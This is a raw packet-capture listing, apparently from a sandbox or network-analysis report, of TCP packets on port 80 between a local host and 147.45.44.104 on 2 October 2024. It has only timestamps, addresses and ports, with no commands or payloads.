                                                                                                            Oct 2, 2024 08:54:59.782350063 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.782371044 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783165932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783178091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783186913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783198118 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783209085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783220053 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783231974 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783233881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783233881 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783260107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783269882 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783281088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783292055 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783301115 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783301115 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783303022 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783314943 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783315897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783329010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.783368111 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.783368111 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784161091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784168959 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784189939 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784199953 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784216881 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784219027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784221888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784233093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784244061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784254074 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784255981 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784255981 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784265995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784276009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784286976 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784297943 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784307957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784307957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784328938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.784362078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.784362078 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785128117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785140038 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785156965 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785167933 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785177946 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785183907 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785195112 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785207033 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785207033 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785212994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785227060 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785238028 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785248995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785248995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785248995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785262108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785273075 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785303116 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785303116 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.785968065 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.785979033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786202908 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.786204100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786216021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786227942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786240101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786250114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786261082 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786267996 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.786267996 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.786273956 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786288023 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.786303997 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786315918 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786325932 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786336899 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786340952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.786340952 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.786349058 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.786400080 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.787194967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787206888 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787229061 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787240982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787245035 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.787252903 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787264109 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787286043 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787292004 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.787292004 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.787296057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787303925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787306070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787307978 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787316084 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787324905 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.787400961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.787400961 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788188934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788201094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788211107 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788223982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788234949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788247108 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788256884 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788271904 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788276911 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788276911 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788280964 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788288116 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788295984 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788304090 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788311958 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788319111 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.788321018 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788321018 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788353920 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788386106 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.788681984 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791063070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791070938 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791078091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791208029 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791212082 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791219950 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791230917 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791239977 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791249990 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791260004 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791268110 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791268110 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791270971 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791289091 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791297913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791300058 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791310072 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791320086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791330099 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791338921 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791346073 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791346073 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791357040 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791373968 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791376114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791376114 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791393042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791403055 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791413069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791421890 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791424036 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791435957 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791445971 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791449070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791460991 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791461945 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791475058 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791496992 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791510105 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791510105 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791512012 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791527033 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791548967 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791563988 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791574001 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791584015 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791584969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791584969 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791594982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791605949 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791615009 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791624069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791627884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791627884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791637897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791650057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791660070 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.791676998 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791676998 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.791744947 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792503119 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792514086 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792674065 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792675018 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792685986 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792695999 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792705059 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792717934 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792721033 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792742014 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792752981 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792762995 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792773008 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792779922 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792779922 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792788982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792798996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792809963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.792839050 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792839050 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.792860031 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.793570042 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793580055 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793591022 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793603897 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793641090 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.793641090 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.793730021 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793741941 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793752909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793764114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793780088 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.793797970 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.793858051 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.793869019 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794043064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794234991 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794245005 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794375896 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794393063 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794404030 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794411898 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794442892 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794573069 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794584036 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794595003 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794605017 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794610023 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794614077 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794625998 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794635057 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794644117 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794645071 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794655085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794697046 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794697046 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794826031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794836044 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794845104 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794861078 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794871092 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794879913 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794891119 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794899940 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794904947 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794904947 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794912100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794923067 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794934034 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794939995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794939995 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794945002 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794958115 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794967890 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.794981956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.794981956 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.795250893 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796087027 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796097994 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796106100 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796116114 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796125889 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796137094 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796148062 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796154022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796154022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796159029 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796169996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796180010 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796190977 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796192884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796192884 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796201944 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796222925 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796231985 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796235085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796246052 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796284914 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.796406031 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796940088 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.796948910 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797123909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797133923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797142982 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797152996 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797158957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797158957 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797163963 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797203064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797203064 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797404051 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797429085 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797480106 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797491074 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797501087 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797511101 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797522068 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797523022 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797523975 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797671080 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797681093 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797689915 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797699928 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797702074 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797702074 CEST4970280192.168.2.7147.45.44.104
                                                                                                            Oct 2, 2024 08:54:59.797709942 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797720909 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797730923 CEST8049702147.45.44.104192.168.2.7
                                                                                                            Oct 2, 2024 08:54:59.797741890 CEST8049702147.45.44.104192.168.2.7
